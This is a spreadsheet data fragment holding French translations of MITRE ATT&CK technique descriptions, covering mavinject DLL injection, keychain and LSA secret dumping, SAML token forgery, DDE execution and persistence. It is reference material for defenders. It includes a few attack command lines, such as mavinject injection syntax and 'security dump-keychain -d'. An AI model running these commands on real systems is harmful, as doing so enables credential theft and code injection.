Les adversaires peuvent abuser de mavinject.exe pour injecter des DLL malveillantes dans les processus en cours d’exécution (par exemple, [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), permettant l’exécution arbitraire de code (par exemple, &lt;code&gt;C :\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL&lt;/code&gt;). (Citation : ATT Lazarus TTP Evolution)(Citation : Reaqta Mavinject) Étant donné que mavinject.exe peuvent être signées numériquement par Microsoft, l’exécution par proxy via cette méthode peut échapper à la détection par les produits de sécurité, car l’exécution est masquée dans le cadre d’un processus légitime. 
En plus de [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe peut également être utilisé de manière abusive pour effectuer l’injection de descripteurs d’importation via son paramètre &lt;code&gt;de ligne de commande /HMODULE&lt;/code&gt; (par exemple, &lt;code&gt;mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER&lt;/code&gt;). Cette commande injecterait une entrée de table d’importation composée de la DLL spécifiée dans le module à l’adresse de base donnée. (Citation : Fonctionnalité Mavinject déconstruite)
https://attack.mitre.org/techniques/T1218/013</t>
  </si>
  <si>
    <t>Les adversaires peuvent regrouper les données collectées dans un emplacement central ou un répertoire sur le système local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Les adversaires peuvent également regrouper les données collectées dans divers formats/emplacements disponibles d’un système, y compris les bases de données/référentiels de stockage locaux ou le registre Windows. (Citation : Prevailion DarkWatchman 2021)
https://attack.mitre.org/techniques/T1074/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent correspondre ou se rapprocher du nom ou de l’emplacement de fichiers ou de ressources légitimes lorsqu’ils les nomment/placent. Ceci est fait dans le but d’échapper aux défenses et à l’observation. Cela peut être fait en plaçant un exécutable dans un répertoire de confiance commune (ex : sous System32) ou en lui donnant le nom d’un programme légitime et fiable (ex : svchost.exe). Dans les environnements conteneurisés, cela peut également être fait en créant une ressource dans un espace de noms qui correspond à la convention de nommage d’un pod ou d’un cluster de conteneur. Alternativement, un nom de fichier ou d’image de conteneur donné peut être une approximation proche de programmes/images légitimes ou quelque chose d’inoffensif.
Les adversaires peuvent également utiliser la même icône que celle du fichier qu’ils essaient d’imiter.
https://attack.mitre.org/techniques/T1036/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer des certificats SSL/TLS auto-signés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Dans le cas de l’auto-signature, les certificats numériques ne disposent pas de l’élément de confiance associé à la signature d’une autorité de certification (CA) tierce.
Les adversaires peuvent créer des certificats SSL/TLS auto-signés qui peuvent être utilisés pour poursuivre leurs opérations, telles que le chiffrement du trafic C2 (ex : [Chiffrement asymétrique](https://attack.mitre.org/techniques/T1573/002) avec [Protocoles Web](https://attack.mitre.org/techniques/T1071/001)) ou même l’activation de [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) s’ils sont ajoutés à la racine de confiance (c’est-à-dire [Installer le certificat racine](https://attack.mitre.org/techniques/T1553/004)).
Après avoir créé un certificat numérique, un adversaire peut ensuite installer ce certificat (voir [Installer un certificat numérique](https://attack.mitre.org/techniques/T1608/003)) sur l’infrastructure sous son contrôle.
https://attack.mitre.org/techniques/T1587/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent insérer, supprimer ou manipuler des données au repos afin d’influencer des résultats externes ou de cacher des activités, menaçant ainsi l’intégrité des données. (Citation : FireEye APT38 octobre 2018)(Citation : DOJ Lazarus Sony 2018) En manipulant les données stockées, les adversaires peuvent tenter d’affecter un processus métier, la compréhension organisationnelle et la prise de décision.
Les données stockées peuvent inclure divers formats de fichiers, tels que des fichiers Office, des bases de données, des e-mails stockés et des formats de fichiers personnalisés. Le type de modification et l’impact qu’elle aura dépendent du type de données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https://attack.mitre.org/techniques/T1565/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser le craquage de mot de passe pour tenter de récupérer des informations d’identification utilisables, telles que des mots de passe en texte brut, lorsque des éléments d’identification tels que des hachages de mot de passe sont obtenus. [Vidage des informations d’identification du système d’exploitation](https://attack.mitre.org/techniques/T1003) peut être utilisé pour obtenir des hachages de mot de passe, cela ne peut obtenir un adversaire que jusqu’à présent lorsque [Passer le hachage](https://attack.mitre.org/techniques/T1550/002) n’est pas une option. De plus, les adversaires peuvent exploiter [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) afin d’obtenir des informations d’identification hachées pour les périphériques réseau. (Référence : US-CERT-TA18-106A) 
Des techniques permettant de deviner systématiquement les mots de passe utilisés pour calculer les hachages sont disponibles, ou l’adversaire peut utiliser une table arc-en-ciel précalculée pour craquer les hachages. Le craquage des hachages est généralement effectué sur des systèmes contrôlés par l’adversaire en dehors du réseau cible. (Citation : Wikipédia Craquage de mot de passe) Le mot de passe en texte brut résultant d’un hachage réussi peut être utilisé pour se connecter aux systèmes, ressources et services auxquels le compte a accès.
https://attack.mitre.org/techniques/T1110/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent cibler les e-mails des utilisateurs sur les systèmes locaux pour collecter des informations sensibles. Les fichiers contenant des données de courrier électronique peuvent être acquis à partir du système local d’un utilisateur, tel que le stockage Outlook ou les fichiers cache.
Outlook stocke les données localement dans des fichiers de données hors connexion avec l’extension .ost. Outlook 2010 et versions ultérieures prennent en charge des fichiers .ost d’une taille maximale de 50 Go, tandis que les versions antérieures d’Outlook prennent en charge jusqu’à 20 Go. (Citation : Tailles de fichier Outlook) Les comptes IMAP dans Outlook 2013 (et versions antérieures) et les comptes POP utilisent des fichiers de données Outlook (.pst) au lieu de .ost, tandis que les comptes IMAP dans Outlook 2016 (et versions ultérieures) utilisent des fichiers .ost. Les deux types de fichiers de données Outlook sont généralement stockés dans 'C :\Users\&lt;username&gt;\Documents\Outlook Files' ou 'C :\Users\&lt;username&gt;\AppData\Local\Microsoft\Outlook'.( Citation : Fichiers Microsoft Outlook)
https://attack.mitre.org/techniques/T1114/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir des informations d’identification à partir du trousseau. Le trousseau (ou Services de trousseau) est le système de gestion des informations d’identification macOS qui stocke les noms de compte, les mots de passe, les clés privées, les certificats, les données d’application sensibles, les données de paiement et les notes sécurisées. Il existe trois types de trousseaux : le trousseau de connexion, le trousseau système et le trousseau d’éléments locaux (iCloud). Le trousseau par défaut est le trousseau de connexion, qui stocke les mots de passe et les informations des utilisateurs. Le trousseau système stocke les éléments auxquels le système d’exploitation accédait, tels que les éléments partagés entre les utilisateurs d’un hôte. Le trousseau d’articles locaux (iCloud) est utilisé pour les éléments synchronisés avec le service iCloud d’Apple. 
Les trousseaux peuvent être affichés et modifiés via l’application Trousseau d’accès ou à l’aide de l’utilitaire &lt;code&gt;de sécurité de&lt;/code&gt; ligne de commande. Les fichiers du trousseau se trouvent dans &lt;code&gt;~/Library/Keychains/&lt;/code&gt;, &lt;code&gt;/Library/Keychains/&lt;/code&gt; et &lt;code&gt;/Network/Library/Keychains/&lt;/code&gt;. (Citation : Keychain Services Apple)(Citation : Passware de déchiffrement du trousseau)(Citation : Porte-clés OSX Schaumann)
Les adversaires peuvent collecter les informations d’identification de l’utilisateur à partir du stockage/de la mémoire du trousseau. Par exemple, la commande &lt;code&gt;security dump-keychain –d&lt;/code&gt; sauvegardera toutes les informations d’identification du trousseau de connexion à partir de &lt;code&gt;~/Library/Keychains/login.keychain-db&lt;/code&gt;. Les adversaires peuvent également lire directement les informations d’identification du trousseau de connexion à partir du fichier &lt;code&gt;~/Library/Keychains/login.keychain&lt;/code&gt;. Les deux méthodes nécessitent un mot de passe, où le mot de passe par défaut pour le trousseau de connexion est le mot de passe de l’utilisateur actuel pour se connecter à l’hôte macOS. (citation : externe à DA, à la manière d’OS X)(Citation : Décryptage du porte-clés Empire)
https://attack.mitre.org/techniques/T1555/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent configurer les paramètres système pour exécuter automatiquement un programme lors du démarrage ou de la connexion du système afin de maintenir la persistance ou d’obtenir des privilèges de niveau supérieur sur les systèmes compromis. Les systèmes d’exploitation peuvent avoir des mécanismes pour exécuter automatiquement un programme lors du démarrage du système ou de la connexion au compte. (Citation : Clé d’exécution Microsoft)(Citation : Packages d’authentification MSDN)(Citation : Microsoft TimeProvider)(Citation : Cylance Reg Persistence septembre 2013)(Citation : Programmation du noyau Linux) Ces mécanismes peuvent inclure l’exécution automatique de programmes placés dans des répertoires spécialement désignés ou référencés par des référentiels qui stockent des informations de configuration, tels que le registre Windows. Un adversaire peut atteindre le même objectif en modifiant ou en étendant des fonctionnalités du noyau.
Étant donné que certains programmes de démarrage automatique de démarrage ou d’ouverture de session s’exécutent avec des privilèges plus élevés, un adversaire peut les exploiter pour élever les privilèges.
https://attack.mitre.org/techniques/T1547</t>
  </si>
  <si>
    <t>Les adversaires disposant d’un accès SYSTEM à un hôte peuvent tenter d’accéder aux secrets LSA (Local Security Authority), qui peuvent contenir divers éléments d’identification différents, tels que des informations d’identification pour les comptes de service. (Citation : Passcape LSA Secrets)(citation : Modèle de niveau administrateur Microsoft AD)(Citation : Références Windows Tilbury) Les secrets LSA sont stockés dans le registre à l’emplacement &lt;code&gt;HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets&lt;/code&gt;. Les secrets LSA peuvent également être vidés de la mémoire. (Citation : ired Dumping LSA Secrets)
[Rég.](https://attack.mitre.org/software/S0075) peut être utilisé pour extraire du registre. [Mimikatz](https://attack.mitre.org/software/S0002) peut être utilisé pour extraire des secrets de la mémoire. (Citation : ired Dumping LSA Secrets)
https://attack.mitre.org/techniques/T1003/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre la capacité de chiffrement d’un périphérique réseau afin de contourner le chiffrement qui protégerait autrement les communications de données. (Citation : Cisco Synful Knock Evolution)
Le chiffrement peut être utilisé pour protéger le trafic réseau transmis afin de préserver sa confidentialité (protection contre la divulgation non autorisée) et son intégrité (protection contre les modifications non autorisées). Les chiffrements de chiffrement sont utilisés pour convertir un message en texte brut en texte chiffré et peuvent nécessiter beaucoup de calcul pour être déchiffrés sans la clé de déchiffrement associée. En règle générale, les clés plus longues augmentent le coût de la cryptanalyse, ou du déchiffrement sans la clé.
Les adversaires peuvent compromettre et manipuler les appareils qui effectuent le chiffrement du trafic réseau. Par exemple, par le biais de comportements tels que [Modifier l’image système](https://attack.mitre.org/techniques/T1601), [Réduire l’espace clé](https://attack.mitre.org/techniques/T1600/001) et [Désactiver le matériel cryptographique](https://attack.mitre.org/techniques/T1600/002), un adversaire peut affecter négativement et/ou éliminer la capacité d’un appareil à chiffrer en toute sécurité le trafic réseau. Cela présente un risque accru de divulgation non autorisée et peut faciliter la manipulation des données, l’accès aux identifiants ou les efforts de collecte. (Citation : Blog Cisco Legacy Device Attacks)
https://attack.mitre.org/techniques/T1600</t>
  </si>
  <si>
    <t>Un adversaire peut falsifier des jetons SAML avec toutes les autorisations, revendications et durées de vie s’il possède un certificat de signature de jeton SAML valide. (Citation : Étapes de Microsoft SolarWinds) La durée de vie par défaut d’un jeton SAML est d’une heure, mais la période de validité peut être spécifiée dans la valeur &lt;code&gt;NotOnOrAfter&lt;/code&gt; de l’élément &lt;code&gt;conditions ...&lt;/code&gt; d’un jeton. Cette valeur peut être modifiée à l’aide de &lt;code&gt;AccessTokenLifetime&lt;/code&gt; dans une &lt;code&gt;LifetimeTokenPolicy&lt;/code&gt;. (Citation : Durée de vie des jetons SAML Microsoft) Les jetons SAML falsifiés permettent aux adversaires de s’authentifier sur les services qui utilisent SAML 2.0 comme mécanisme d’authentification unique (SSO). (Citation : Cyberark Golden SAML)
Un adversaire peut utiliser des [clés privées](https://attack.mitre.org/techniques/T1552/004) pour compromettre le certificat de signature de jeton d’une organisation afin de créer des jetons SAML falsifiés. Si l’adversaire dispose des autorisations suffisantes pour établir une nouvelle approbation de fédération avec son propre serveur AD FS (Active Directory Federation Services), il peut générer son propre certificat de signature de jeton approuvé. (Citation : Guide client de Microsoft SolarWinds) Cela diffère de [Voler le jeton d’accès à l’application](https://attack.mitre.org/techniques/T1528) et d’autres comportements similaires en ce sens que les jetons sont nouveaux et falsifiés par l’adversaire, plutôt que volés ou interceptés auprès d’utilisateurs légitimes.
Un adversaire peut obtenir des privilèges d’ID Entra administratif si un jeton SAML falsifié qui prétend représenter un compte hautement privilégié est falsifié. Cela peut conduire à [Utiliser un autre matériel d’authentification](https://attack.mitre.org/techniques/T1550), qui peut contourner les mécanismes de protection multifactoriels et autres mécanismes de protection contre l’authentification. (Citation : Guide client de Microsoft SolarWinds)
https://attack.mitre.org/techniques/T1606/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent faire passer des charges utiles malveillantes pour des fichiers légitimes en modifiant la mise en forme de la charge utile, y compris la signature, l’extension et le contenu du fichier. Différents types de fichiers ont un format standard typique, y compris la façon dont ils sont encodés et organisés. Par exemple, la signature d’un fichier (également appelée en-tête ou octets magiques) est le premier octet d’un fichier et est souvent utilisée pour identifier le type de fichier. Par exemple, l’en-tête d’un fichier JPEG est &lt;code&gt; 0xFF 0xD8&lt;/code&gt; et l’extension de fichier est '. JPE', '. JPEG » ou « .JPG ». 
Les adversaires peuvent modifier le code hexadécimal de l’en-tête et/ou l’extension de fichier d’une charge utile malveillante afin de contourner les vérifications de validation de fichier et/ou le nettoyage des entrées. Ce comportement est couramment utilisé lorsque des fichiers de charge utile sont transférés (par exemple, [Transfert d’outil d’entrée](https://attack.mitre.org/techniques/T1105)) et stockés (par exemple, [Charger un logiciel malveillant](https://attack.mitre.org/techniques/T1608/001)) afin que les adversaires puissent déplacer leurs programmes malveillants sans déclencher de détections. 
Les types et extensions de fichiers non exécutables courants, tels que les fichiers texte (.txt  et les fichiers image (.jpg .gif, etc.) peuvent généralement être traités comme inoffensifs.  Sur cette base, les adversaires peuvent utiliser une extension de fichier pour dissimuler des logiciels malveillants, par exemple en nommant un code de porte dérobée PHP avec un nom de fichier de &lt;code&gt;test.gif&lt;/code&gt;. Un utilisateur peut ne pas savoir qu’un fichier est malveillant en raison de son apparence bénigne et de son extension.
Les fichiers polygots, c’est-à-dire des fichiers qui ont plusieurs types de fichiers différents et qui fonctionnent différemment en fonction de l’application qui les exécutera, peuvent également être utilisés pour dissimuler des logiciels malveillants et des capacités malveillantes. (Référence : polygot_icedID)
https://attack.mitre.org/techniques/T1036/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent arrêter ou désactiver des services sur un système pour rendre ces services indisponibles pour les utilisateurs légitimes. L’arrêt de services ou de processus critiques peut inhiber ou arrêter la réponse à un incident ou contribuer aux objectifs globaux de l’adversaire de causer des dommages à l’environnement. (Citation : Talos Olympic Destroyer 2018)(Citation : Novetta Blockbuster) 
Les adversaires peuvent y parvenir en désactivant des services individuels de grande importance pour une organisation, tels que &lt;code&gt;MSExchangeIS,&lt;/code&gt; ce qui rendra le contenu Exchange inaccessible. (Citation : Novetta Blockbuster) Dans certains cas, les adversaires peuvent arrêter ou désactiver plusieurs ou tous les services pour rendre les systèmes inutilisables. (Citation : Talos Olympic Destroyer 2018) Les services ou les processus peuvent ne pas permettre la modification de leurs magasins de données pendant leur exécution. Les adversaires peuvent arrêter des services ou des processus afin d’effectuer [Destruction de données](https://attack.mitre.org/techniques/T1485) ou [Données chiffrées pour impact](https://attack.mitre.org/techniques/T1486) sur les magasins de données de services tels qu’Exchange et SQL Server. (Citation : Analyse WannaCry de SecureWorks)
https://attack.mitre.org/techniques/T1489</t>
  </si>
  <si>
    <t>Les adversaires peuvent développer des logiciels malveillants et des composants de logiciels malveillants qui peuvent être utilisés lors du ciblage. La création de logiciels malveillants peut inclure le développement de charges utiles, de droppers, d’outils de post-compromission, de portes dérobées (y compris des images de porte dérobée), de packers, de protocoles C2 et la création de supports amovibles infectés. Les adversaires peuvent développer des logiciels malveillants pour soutenir leurs opérations, créant ainsi un moyen de garder le contrôle des machines distantes, d’échapper aux défenses et d’exécuter des comportements post-compromission. (Référence : Mandiant APT1)(Référence : Kaspersky Sofacy)(Citation : ActiveMalwareEnergy)(Citation : FBI Flash FIN7 USB)
Comme pour les efforts de développement légitimes, différents ensembles de compétences peuvent être nécessaires pour développer des logiciels malveillants. Les compétences nécessaires peuvent être acquises à l’interne ou faire l’objet d’une sous-traitance. Le recours à un sous-traitant peut être considéré comme une extension des capacités de développement de logiciels malveillants de cet adversaire, à condition que l’adversaire joue un rôle dans l’élaboration des exigences et maintienne un certain degré d’exclusivité sur le logiciel malveillant.
Certains aspects du développement de logiciels malveillants, tels que le développement du protocole C2, peuvent nécessiter que les adversaires obtiennent une infrastructure supplémentaire. Par exemple, les logiciels malveillants développés qui communiqueront avec Twitter pour C2 peuvent nécessiter l’utilisation de [Services Web](https://attack.mitre.org/techniques/T1583/006). (Référence : FireEye APT29)
https://attack.mitre.org/techniques/T1587/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’énumérer les pilotes de périphériques locaux sur un hôte victime. Les informations sur les pilotes de périphériques peuvent mettre en évidence diverses informations qui façonnent les comportements ultérieurs, tels que la fonction/l’objectif de l’hôte, les outils de sécurité actuels (par exemple, [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) ou d’autres défenses (par exemple, [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), ainsi que les vulnérabilités potentiellement exploitables (par exemple, [Exploitation pour l’élévation de privilèges](https://attack.mitre.org/techniques/T1068)).
De nombreux utilitaires de système d’exploitation peuvent fournir des informations sur les pilotes de périphériques locaux, tels que driverquery.exe et la fonction API « EnumDeviceDrivers() » sous Windows. (Citation : Microsoft Driverquery)(Citation : Microsoft EnumDeviceDrivers) Des informations sur les pilotes de périphériques (ainsi que sur les services associés, c’est-à-dire [System Service Discovery](https://attack.mitre.org/techniques/T1007)) peuvent également être disponibles dans le registre. (Citation : Pilotes de registre Microsoft)
Sous Linux/macOS, les pilotes de périphériques (sous la forme de modules du noyau) peuvent être visibles dans '/dev' ou à l’aide d’utilitaires tels que 'lsmod' et 'modinfo'. (Citation : Programmation du noyau Linux)(Citation : lsmod man)(Citation : modinfo man)
https://attack.mitre.org/techniques/T1652</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir une liste de comptes de domaine. Ces informations peuvent aider les adversaires à déterminer quels comptes de domaine existent pour faciliter les comportements de suivi, tels que le ciblage de comptes spécifiques possédant des privilèges particuliers.
Des commandes telles que &lt;code&gt;net user /domain&lt;/code&gt; et &lt;code&gt;net group /domain&lt;/code&gt; de l’utilitaire [Net](https://attack.mitre.org/software/S0039), &lt;code&gt;dscacheutil -q group&lt;/code&gt; sur macOS et &lt;code&gt;ldapsearch&lt;/code&gt; sur Linux peuvent répertorier les utilisateurs et les groupes de domaine. [PowerShell](https://attack.mitre.org/techniques/T1059/001) les applets de commande, y compris &lt;code&gt;Get-ADUser&lt;/code&gt; et &lt;code&gt;Get-ADGroupMember&lt;/code&gt;, peuvent énumérer les membres de groupes Active Directory. (Citation : CrowdStrike StellarParticle, janvier 2022)
https://attack.mitre.org/techniques/T1087/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir la persistance en ajoutant une clé de registre à l’installation active de l’ordinateur local. L’installation active est un mécanisme Windows qui est utilisé pour exécuter des programmes lorsqu’un utilisateur se connecte. La valeur stockée dans la clé de registre sera exécutée une fois qu’un utilisateur s’est connecté à l’ordinateur. (Citation : Klein Active Setup 2010) Ces programmes seront exécutés dans le contexte de l’utilisateur et disposeront du niveau d’autorisations associé au compte.
Les adversaires peuvent abuser du programme d’installation active en créant une clé sous &lt;code&gt; HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt; et en définissant une valeur malveillante pour &lt;code&gt;StubPath&lt;/code&gt;. Cette valeur servira de programme qui sera exécuté lorsqu’un utilisateur se connectera à l’ordinateur. (Référence : Mandiant Glyer APT 2010)(Citation : Citizenlab Packrat 2015)(Citation : FireEye CFR Watering Hole 2012)(Citation : SECURELIST Bright Star 2015)(Citation : paloalto Tropic Trooper 2016)
Les adversaires peuvent abuser de ces composants pour exécuter des logiciels malveillants, tels que des outils d’accès à distance, afin de maintenir la persistance lors des redémarrages du système. Les adversaires peuvent également utiliser [Mascarade](https://attack.mitre.org/techniques/T1036) pour donner l’impression que les entrées du Registre sont associées à des programmes légitimes.
https://attack.mitre.org/techniques/T1547/014</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de cacher des artefacts associés à leurs comportements pour échapper à la détection. Les systèmes d’exploitation peuvent avoir des fonctionnalités permettant de masquer divers artefacts, tels que des fichiers système importants et l’exécution de tâches administratives, afin d’éviter de perturber l’environnement de travail des utilisateurs et d’empêcher les utilisateurs de modifier les fichiers ou les fonctionnalités du système. Les adversaires peuvent abuser de ces fonctionnalités pour masquer des artefacts tels que des fichiers, des répertoires, des comptes d’utilisateurs ou d’autres activités du système afin d’échapper à la détection. (Citation : Sofacy Komplex Trojan)(Citation : Cybereason OSX Pirrit)(Citation : MalwareBytes ADS juillet 2015)
Les adversaires peuvent également tenter de masquer des artefacts associés à un comportement malveillant en créant des régions informatiques isolées des instruments de sécurité courants, par exemple en utilisant la technologie de virtualisation. (Citation : Sophos Ragnar mai 2020)
https://attack.mitre.org/techniques/T1564</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser Windows Dynamic Data Exchange (DDE) pour exécuter des commandes arbitraires. DDE est un protocole client-serveur pour la communication inter-processus (IPC) unique et/ou continue entre les applications. Une fois qu’un lien est établi, les applications peuvent échanger de manière autonome des transactions composées de chaînes, de liens de données chaudes (notifications lorsqu’un élément de données change), de liens de données chaudes (duplications des modifications apportées à un élément de données) et de demandes d’exécution de commandes.
L’OLE (Object Linking and Embedding), ou la capacité de lier des données entre des documents, a été initialement mise en œuvre par DDE. Bien qu’il ait été remplacé par [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE peut être activé dans Windows 10 et la plupart de Microsoft Office 2016 via des clés de registre. (Citation : BleepingComputer DDE désactivé dans Word décembre 2017)(Citation : Microsoft ADV170021 décembre 2017)(Citation : Microsoft DDE Advisory Nov 2017)
Les documents Microsoft Office peuvent être empoisonnés à l’aide de commandes DDE, directement ou par le biais de fichiers intégrés, et utilisés pour fournir une exécution via des campagnes de [phishing](https://attack.mitre.org/techniques/T1566) ou du contenu Web hébergé, en évitant l’utilisation de macros Visual Basic pour Applications (VBA). (Citation : SensePost PS DDE mai 2016)(Citation : Bouilloire CSV DDE août 2014)(Citation : Enigma Reviving DDE janvier 2018)(Citation : SensePost MacroLess DDE octobre 2017) De même, les adversaires peuvent infecter des charges utiles pour exécuter des applications et/ou des commandes sur un appareil victime en intégrant des formules DDE dans un fichier CSV destiné à être ouvert via un tableur Windows. (Citation : Injection de CSV OWASP)(Citation : Injection de macro CSV Excel )
DDE pourrait également être exploité par un adversaire opérant sur une machine compromise qui n’a pas d’accès direct à un [interpréteur de commandes et de scripts](https://attack.mitre.org/techniques/T1059). L’exécution DDE peut être appelée à distance via [Remote Services](https://attack.mitre.org/techniques/T1021) tels que [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM). (Référence : Fireeye Hunting COM juin 2019)
https://attack.mitre.org/techniques/T1559/002</t>
  </si>
  <si>
    <t>Un adversaire peut s’appuyer sur l’ouverture d’un fichier malveillant par un utilisateur afin d’obtenir l’exécution. Les utilisateurs peuvent être soumis à l’ingénierie sociale pour les amener à ouvrir un fichier qui conduira à l’exécution de code. Cette action de l’utilisateur est généralement observée comme un comportement de suivi de [Pièce jointe de spearphishing](https://attack.mitre.org/techniques/T1566/001). Les adversaires peuvent utiliser plusieurs types de fichiers qui nécessitent l’exécution d’un utilisateur, notamment .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, etc. .reg.
Les adversaires peuvent utiliser diverses formes de [Mascarade](https://attack.mitre.org/techniques/T1036) et de [Fichiers ou informations obscurcis](https://attack.mitre.org/techniques/T1027) pour augmenter la probabilité qu’un utilisateur ouvre et exécute avec succès un fichier malveillant. Ces méthodes peuvent inclure l’utilisation d’une convention de nommage familière et/ou d’un mot de passe protégeant le fichier et la fourniture d’instructions à un utilisateur sur la façon de l’ouvrir. (Citation : Documents Word protégés par mot de passe) 
Bien que [Fichier malveillant](https://attack.mitre.org/techniques/T1204/002) se produise fréquemment peu de temps après l’accès initial, il peut se produire à d’autres phases d’une intrusion, par exemple lorsqu’un adversaire place un fichier dans un répertoire partagé ou sur le bureau d’un utilisateur en espérant qu’un utilisateur cliquera dessus. Cette activité peut également être observée peu de temps après [Spearphishing interne](https://attack.mitre.org/techniques/T1534).
https://attack.mitre.org/techniques/T1204/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur le rythme des affaires de la victime qui peuvent être utilisées lors du ciblage. Les informations sur le rythme des activités d’une organisation peuvent inclure une variété de détails, y compris les heures d’ouverture et les jours de la semaine. Ces informations peuvent également révéler les heures et dates des achats et des expéditions des ressources matérielles et logicielles de la victime.
Les adversaires peuvent recueillir ces informations de différentes manières, par exemple par le biais de l’hameçonnage par le biais de [Phishing for Information](https://attack.mitre.org/techniques/T1598). Des informations sur le rythme des affaires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 de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établissement de ressources opérationnelles (ex : [Établir des comptes](https://attack.mitre.org/techniques/T1585) ou [Compromettre des comptes](https://attack.mitre.org/techniques/T1586)), et/ou d’accès initial (ex : [Chaîne d’approvisionnement Compromis](https://attack.mitre.org/techniques/T1195) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199))
https://attack.mitre.org/techniques/T1591/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent communiquer à l’aide des protocoles de couche applicative publish/subscribe (pub/sub) pour éviter la détection/le filtrage du réseau en se fondant dans le trafic existant. Les commandes adressées au système distant, et souvent les résultats de ces commandes, seront incorporés dans le trafic de protocole entre le client et le serveur. 
Les protocoles tels que &lt;code&gt;MQTT,&lt;/code&gt; &lt;code&gt;XMPP,&lt;/code&gt; &lt;code&gt;AMQP&lt;/code&gt; et &lt;code&gt;STOMP&lt;/code&gt; utilisent une conception de publication/abonnement, la distribution des messages étant gérée par un courtier centralisé. (Citation : crabe gémissant sub/pub)(Citation : Mandiant APT1 Annexe) Les éditeurs classent leurs messages par thèmes, tandis que les abonnés reçoivent des messages en fonction des sujets auxquels ils sont abonnés. (Citation : crabe gémissant sub/pub) Un adversaire peut abuser des protocoles de publication/abonnement pour communiquer avec les systèmes sous son contrôle derrière un courtier de messages tout en imitant le trafic normal et attendu.
https://attack.mitre.org/techniques/T1071/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur le matériel hôte de la victime qui peuvent être utilisées lors du ciblage. Les informations sur l’infrastructure matérielle peuvent inclure une variété de détails tels que les types et les versions sur des hôtes spécifiques, ainsi que la présence de composants supplémentaires qui pourraient indiquer des protections défensives supplémentaires (par exemple, lecteurs de cartes/biométriques, matériel de cryptage dédié, etc.).
Les adversaires peuvent collecter ces informations de différentes manières, par exemple par le biais d’actions de collecte directes via [Analyse active](https://attack.mitre.org/techniques/T1595) (par exemple : noms d’hôte,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l’infrastructure matérielle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opportunités pour d’autres formes de reconnaissance (ex : [Rechercher des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Rechercher des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)), l’établissement de ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou un accès initial (ex : [Compromettre l’approvisionnement en matériel chaîne](https://attack.mitre.org/techniques/T1195/003) ou [Ajouts matériels](https://attack.mitre.org/techniques/T1200)).
https://attack.mitre.org/techniques/T1592/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent fournir des charges utiles à des systèmes distants en ajoutant du contenu à des emplacements de stockage partagés, tels que des lecteurs réseau ou des référentiels de code internes. Le contenu stocké sur des lecteurs réseau ou dans d’autres emplacements partagés peut être altéré par l’ajout de programmes malveillants, de scripts ou de code d’exploitation à des fichiers par ailleurs valides. Une fois qu’un utilisateur ouvre le contenu contaminé partagé, la partie malveillante peut être exécutée pour exécuter le code de l’adversaire sur un système distant. Les adversaires peuvent utiliser du contenu partagé contaminé pour se déplacer latéralement.
Un pivot de partage de répertoire est une variante de cette technique qui utilise plusieurs autres techniques pour propager des logiciels malveillants lorsque les utilisateurs accèdent à un répertoire réseau partagé. Il utilise [Modification de raccourci](https://attack.mitre.org/techniques/T1547/009) du répertoire . Les fichiers LNK qui utilisent [Masquerading](https://attack.mitre.org/techniques/T1036) pour ressembler aux vrais répertoires, qui sont cachés via [Fichiers et répertoires cachés](https://attack.mitre.org/techniques/T1564/001). Le malveillant . Les répertoires basés sur LNK ont une commande intégrée qui exécute le fichier malveillant caché dans le répertoire, puis ouvre le répertoire réel prévu afin que l’action attendue de l’utilisateur se produise toujours. Lorsqu’elle est utilisée avec des annuaires réseau fréquemment utilisés, cette technique peut entraîner des réinfections fréquentes et un accès étendu aux systèmes et potentiellement à de nouveaux comptes à privilèges plus élevés. (Citation : Retwin Directory Share Pivot)
Les adversaires peuvent également compromettre les répertoires de réseau partagés par le biais d’infections binaires en ajoutant ou en ajoutant son code au code binaire sain sur le répertoire de réseau partagé. Le logiciel malveillant peut modifier le point d’entrée d’origine (OEP) du binaire sain pour s’assurer qu’il est exécuté avant le code légitime. L’infection peut continuer à se propager via le fichier nouvellement infecté lorsqu’elle est exécutée par un système distant. Ces infections peuvent cibler à la fois des formats binaires et non binaires qui se terminent par des extensions incluant, mais sans s’y limiter, .EXE, .DLL, . SCR, .BAT et/ou .VBS.
https://attack.mitre.org/techniques/T1080</t>
  </si>
  <si>
